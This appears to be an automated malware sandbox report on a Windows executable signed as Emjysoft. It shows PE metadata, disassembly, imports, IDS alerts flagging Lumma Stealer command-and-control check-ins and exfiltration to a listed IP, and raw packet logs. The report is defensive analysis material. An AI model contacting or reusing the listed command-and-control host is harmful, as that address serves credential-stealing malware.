                                                                                                                                                                  Signature Valid:false
                                                                                                                                                                  Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                  Error Number:-2146869232
                                                                                                                                                                  Not Before, Not After
                                                                                                                                                                  • 03/05/2023 01:00:00 03/05/2026 00:59:59
                                                                                                                                                                  Subject Chain
                                                                                                                                                                  • CN=Emjysoft, O=Emjysoft, S=Auvergne-Rh\xf4ne-Alpes, C=FR
                                                                                                                                                                  Version:3
                                                                                                                                                                  Thumbprint MD5:3A209510BAACD4B48C20A0F8656AA26A
                                                                                                                                                                  Thumbprint SHA-1:47D58D082C452B3086973BEE37FB549F965F9E0B
                                                                                                                                                                  Thumbprint SHA-256:6F9838A2DA08559B3E0FE2156E99EA0AA4F3D1CD43675980B806CDECA7A5E616
                                                                                                                                                                  Serial:00989AAB57D7FCC43812B213AEDEA41AB6
                                                                                                                                                                  Instruction
                                                                                                                                                                  push ebp
                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                  add esp, FFFFFFF4h
                                                                                                                                                                  push ebx
                                                                                                                                                                  mov eax, 00463A68h
                                                                                                                                                                  call 00007F76ACCD3000h
                                                                                                                                                                  mov ebx, dword ptr [00464D18h]
                                                                                                                                                                  mov eax, dword ptr [ebx]
                                                                                                                                                                  call 00007F76ACCF8737h
                                                                                                                                                                  mov eax, dword ptr [ebx]
                                                                                                                                                                  mov edx, 00463D08h
                                                                                                                                                                  call 00007F76ACCF8443h
                                                                                                                                                                  mov eax, dword ptr [ebx]
                                                                                                                                                                  add eax, 34h
                                                                                                                                                                  mov edx, 00463D38h
                                                                                                                                                                  call 00007F76ACCD154Ch
                                                                                                                                                                  mov ecx, dword ptr [00464BCCh]
                                                                                                                                                                  mov eax, dword ptr [ebx]
                                                                                                                                                                  mov edx, dword ptr [00463614h]
                                                                                                                                                                  call 00007F76ACCF8721h
                                                                                                                                                                  mov ecx, dword ptr [00464D54h]
                                                                                                                                                                  mov eax, dword ptr [ebx]
                                                                                                                                                                  mov edx, dword ptr [0046205Ch]
                                                                                                                                                                  call 00007F76ACCF870Eh
                                                                                                                                                                  mov ecx, dword ptr [00464D7Ch]
                                                                                                                                                                  mov eax, dword ptr [ebx]
                                                                                                                                                                  mov edx, dword ptr [00462C68h]
                                                                                                                                                                  call 00007F76ACCF86FBh
                                                                                                                                                                  mov ecx, dword ptr [00464D68h]
                                                                                                                                                                  mov eax, dword ptr [ebx]
                                                                                                                                                                  mov edx, dword ptr [004602F4h]
                                                                                                                                                                  call 00007F76ACCF86E8h
                                                                                                                                                                  mov ecx, dword ptr [00464DF4h]
                                                                                                                                                                  mov eax, dword ptr [ebx]
                                                                                                                                                                  mov edx, dword ptr [0044EA78h]
                                                                                                                                                                  call 00007F76ACCF86D5h
                                                                                                                                                                  mov ecx, dword ptr [00464DCCh]
                                                                                                                                                                  mov eax, dword ptr [ebx]
                                                                                                                                                                  mov edx, dword ptr [0045F9B0h]
                                                                                                                                                                  call 00007F76ACCF86C2h
                                                                                                                                                                  mov eax, dword ptr [ebx]
                                                                                                                                                                  call 00007F76ACCF8747h
                                                                                                                                                                  pop ebx
                                                                                                                                                                  call 00007F76ACCD1349h
                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x660000x1e1c.idata
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x710000x136e00.rsrc
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x4ba3a040x2d70
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x6a0000x66e0.reloc
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x690000x18.rdata
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                  CODE0x10000x62d440x62e00a608b75b620bc9899da54425632a33e5False0.5154768489254109data6.498737751055233IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                  DATA0x640000xe2c0x1000b9ffc5470506451801f9a3ee8bb378ebFalse0.396240234375data3.9376047457579335IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                  BSS0x650000xa650x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                  .idata0x660000x1e1c0x20001e4c463a52feae64e21dcc93c56c27feFalse0.358642578125data4.711728774841513IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                  .tls0x680000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                  .rdata0x690000x180x2006eda95e7f89fac29502da04b93c31e66False0.05078125data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                                  .reloc0x6a0000x66e00x68002a6e3bd94e29f2f2a46d5c3d5d03f649False0.6045297475961539data6.636864870170326IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                                  .rsrc0x710000x136e000x136e00ab6dad1a6881f59023e131ce70af5cd4False0.42046611127864897data7.584171439487795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                  RT_CURSOR0x71b580x134Targa image data 64 x 65536 x 1 +32 "\001"FrenchFrance0.5714285714285714
                                                                                                                                                                  RT_CURSOR0x71c8c0x134data0.4642857142857143
                                                                                                                                                                  RT_CURSOR0x71dc00x134data0.4805194805194805
                                                                                                                                                                  RT_CURSOR0x71ef40x134data0.38311688311688313
                                                                                                                                                                  RT_CURSOR0x720280x134data0.36038961038961037
                                                                                                                                                                  RT_CURSOR0x7215c0x134data0.4090909090909091
                                                                                                                                                                  RT_CURSOR0x722900x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                                                                                                  RT_CURSOR0x723c40x134data0.38636363636363635
                                                                                                                                                                  RT_CURSOR0x724f80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                                                                                                                                  RT_ICON0x7262c0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsFrenchFrance0.6252665245202559
                                                                                                                                                                  RT_ICON0x734d40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsFrenchFrance0.769404332129964
                                                                                                                                                                  RT_ICON0x73d7c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsFrenchFrance0.611271676300578
                                                                                                                                                                  RT_ICON0x742e40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600FrenchFrance0.3741701244813278
                                                                                                                                                                  RT_ICON0x7688c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224FrenchFrance0.599671669793621
                                                                                                                                                                  RT_ICON0x779340x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088FrenchFrance0.725177304964539
                                                                                                                                                                  RT_STRING0x77d9c0xecdata0.5466101694915254
                                                                                                                                                                  RT_STRING0x77e880x130data0.5493421052631579
                                                                                                                                                                  RT_STRING0x77fb80x224data0.4306569343065693
                                                                                                                                                                  RT_STRING0x781dc0x5ccdata0.32681940700808626
                                                                                                                                                                  RT_STRING0x787a80x254data0.5016778523489933
                                                                                                                                                                  RT_STRING0x789fc0x128data0.5304054054054054
                                                                                                                                                                  RT_STRING0x78b240x2d8data0.4532967032967033
                                                                                                                                                                  RT_STRING0x78dfc0x4a8data0.3859060402684564
                                                                                                                                                                  RT_STRING0x792a40x43cdata0.34501845018450183
                                                                                                                                                                  RT_STRING0x796e00x314data0.37817258883248733
                                                                                                                                                                  RT_STRING0x799f40xe4data0.5570175438596491
                                                                                                                                                                  RT_STRING0x79ad80xb8data0.5543478260869565
                                                                                                                                                                  RT_STRING0x79b900x384data0.4266666666666667
                                                                                                                                                                  RT_STRING0x79f140x434data0.370817843866171
                                                                                                                                                                  RT_STRING0x7a3480x368data0.39908256880733944
                                                                                                                                                                  RT_RCDATA0x7a6b00x10data1.5
                                                                                                                                                                  RT_RCDATA0x7a6c00x2b0data0.7311046511627907
                                                                                                                                                                  RT_RCDATA0x7a9700x2722Delphi compiled form 'TEnvoyerResultatDlg'0.3609502894789379
                                                                                                                                                                  RT_RCDATA0x7d0940x644e6Delphi compiled form 'TEtoileDlg'0.4514499067795373
                                                                                                                                                                  RT_RCDATA0xe157c0x2cb13Delphi compiled form 'TPerfCDInfoDlg'0.19966786664408742
                                                                                                                                                                  RT_RCDATA0x10e0900x12412Delphi compiled form 'TPerfCDROMChartDlg'0.10465427310418617
                                                                                                                                                                  RT_RCDATA0x1204a40x2d672Delphi compiled form 'TPerfCDROMDlg'0.1919825778351347
                                                                                                                                                                  RT_RCDATA0x14db180x77fDelphi compiled form 'TSelectionCDROMDlg'0.39030745179781134
                                                                                                                                                                  RT_GROUP_CURSOR0x14e2980x14Lotus unknown worksheet or configuration, revision 0x1FrenchFrance1.25
                                                                                                                                                                  RT_GROUP_CURSOR0x14e2ac0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                  RT_GROUP_CURSOR0x14e2c00x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                  RT_GROUP_CURSOR0x14e2d40x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                                                                  RT_GROUP_CURSOR0x14e2e80x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                  RT_GROUP_CURSOR0x14e2fc0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                  RT_GROUP_CURSOR0x14e3100x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                  RT_GROUP_CURSOR0x14e3240x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                  RT_GROUP_CURSOR0x14e3380x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                  RT_GROUP_ICON0x14e34c0x5adataFrenchFrance0.7333333333333333
                                                                                                                                                                  RT_VERSION0x14e3a80x360dataFrenchFrance0.4652777777777778
                                                                                                                                                                  RT_MANIFEST0x14e7080x2bdXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4893009985734665
                                                                                                                                                                  DLLImport
                                                                                                                                                                  kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpyA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, ExitProcess, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, CreateFileA, CloseHandle
                                                                                                                                                                  user32.dllGetKeyboardType, LoadStringA, MessageBoxA
                                                                                                                                                                  advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                                                                  oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                                                  kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA, GetModuleFileNameA
                                                                                                                                                                  advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCreateKeyExA, RegCloseKey
                                                                                                                                                                  kernel32.dllWriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ReadFile, OutputDebugStringA, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                                                                                                  gdi32.dllUnrealizeObject, TextOutA, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetTextAlign, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RoundRect, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetBrushOrgEx, GetBkColor, GetBitmapBits, ExcludeClipRect, EnumFontsA, EnumFontFamiliesExA, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgnIndirect, CreateRectRgn, CreatePolygonRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt, Arc
                                                                                                                                                                  user32.dllWindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowOwnedPopups, ShowCursor, SetWindowRgn, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadIconA, LoadCursorA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRgn, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetSystemMetrics, GetSystemMenu, GetSysColor, GetSubMenu, GetScrollPos, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIcon, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreateWindowExA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharLowerBuffA, CharLowerA, CharUpperBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                                                  comctl32.dllImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                                                                                                  shell32.dllShellExecuteA
                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                  FrenchFrance
                                                                                                                                                                  EnglishUnited States

                                                                                                                                                                  Download Network PCAP: filteredfull

                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                  2025-01-28T16:15:57.972873+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734104.21.60.241443TCP
                                                                                                                                                                  2025-01-28T16:15:58.771885+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449734104.21.60.241443TCP
                                                                                                                                                                  2025-01-28T16:15:58.771885+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449734104.21.60.241443TCP
                                                                                                                                                                  2025-01-28T16:15:59.294730+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736104.21.60.241443TCP
                                                                                                                                                                  2025-01-28T16:15:59.782405+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449736104.21.60.241443TCP
                                                                                                                                                                  2025-01-28T16:15:59.782405+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449736104.21.60.241443TCP
                                                                                                                                                                  2025-01-28T16:16:01.039050+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738104.21.60.241443TCP
                                                                                                                                                                  2025-01-28T16:16:13.829900+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743104.21.60.241443TCP
                                                                                                                                                                  2025-01-28T16:16:26.672332+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744104.21.60.241443TCP
                                                                                                                                                                  2025-01-28T16:16:40.165943+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449752104.21.60.241443TCP
                                                                                                                                                                  2025-01-28T16:16:40.931548+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449752104.21.60.241443TCP
                                                                                                                                                                  2025-01-28T16:16:43.058158+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449773104.21.60.241443TCP
                                                                                                                                                                  2025-01-28T16:16:43.064017+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.449773104.21.60.241443TCP
                                                                                                                                                                  2025-01-28T16:16:57.101132+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449859104.21.60.241443TCP
                                                                                                                                                                  2025-01-28T16:16:57.561213+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449859104.21.60.241443TCP
                                                                                                                                                                  2025-01-28T16:16:58.057907+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449865104.26.3.16443TCP
                                                                                                                                                                  • Total Packets: 112
                                                                                                                                                                  • 443 (HTTPS)
                                                                                                                                                                  • 53 (DNS)
                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                  Jan 28, 2025 16:15:57.477778912 CET49734443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:57.477822065 CET44349734104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:57.478013039 CET49734443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:57.497462988 CET49734443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:57.497498035 CET44349734104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:57.972676039 CET44349734104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:57.972872972 CET49734443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:57.976839066 CET49734443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:57.976876020 CET44349734104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:57.977258921 CET44349734104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:58.019187927 CET49734443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:58.040186882 CET49734443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:58.040254116 CET49734443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:58.040333033 CET44349734104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:58.771898031 CET44349734104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:58.772011042 CET44349734104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:58.775079012 CET49734443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:58.780647993 CET49734443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:58.780684948 CET44349734104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:58.780730963 CET49734443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:58.780764103 CET44349734104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:58.811094999 CET49736443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:58.811121941 CET44349736104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:58.811242104 CET49736443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:58.811567068 CET49736443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:58.811584949 CET44349736104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:59.294658899 CET44349736104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:59.294729948 CET49736443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:59.296000004 CET49736443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:59.296010971 CET44349736104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:59.296260118 CET44349736104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:59.297472000 CET49736443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:59.297498941 CET49736443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:59.297552109 CET44349736104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:59.782406092 CET44349736104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:59.782489061 CET44349736104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:59.782527924 CET44349736104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:59.782563925 CET44349736104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:59.782591105 CET49736443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:59.782615900 CET44349736104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:59.782640934 CET49736443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:59.782933950 CET44349736104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:59.782980919 CET49736443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:59.782989979 CET44349736104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:59.783217907 CET44349736104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:59.783278942 CET49736443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:59.783288002 CET44349736104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:59.787256002 CET44349736104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:59.787305117 CET44349736104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:59.787350893 CET49736443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:59.787358999 CET44349736104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:59.787638903 CET49736443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:59.870683908 CET44349736104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:59.870763063 CET44349736104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:59.870848894 CET44349736104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:59.870896101 CET49736443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:59.870942116 CET49736443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:59.871129990 CET49736443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:59.871145964 CET44349736104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:15:59.871160030 CET49736443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:15:59.871165991 CET44349736104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:00.558666945 CET49738443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:00.558710098 CET44349738104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:00.558850050 CET49738443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:00.559216976 CET49738443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:00.559232950 CET44349738104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:01.038968086 CET44349738104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:01.039050102 CET49738443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:01.040450096 CET49738443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:01.040462017 CET44349738104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:01.040726900 CET44349738104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:01.042337894 CET49738443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:01.042519093 CET49738443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:01.042550087 CET44349738104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:01.042646885 CET49738443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:01.042655945 CET44349738104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:13.226144075 CET44349738104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:13.226250887 CET44349738104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:13.226315022 CET49738443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:13.232762098 CET49738443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:13.232778072 CET44349738104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:13.366518974 CET49743443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:13.366544008 CET44349743104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:13.366630077 CET49743443192.168.2.4104.21.60.241
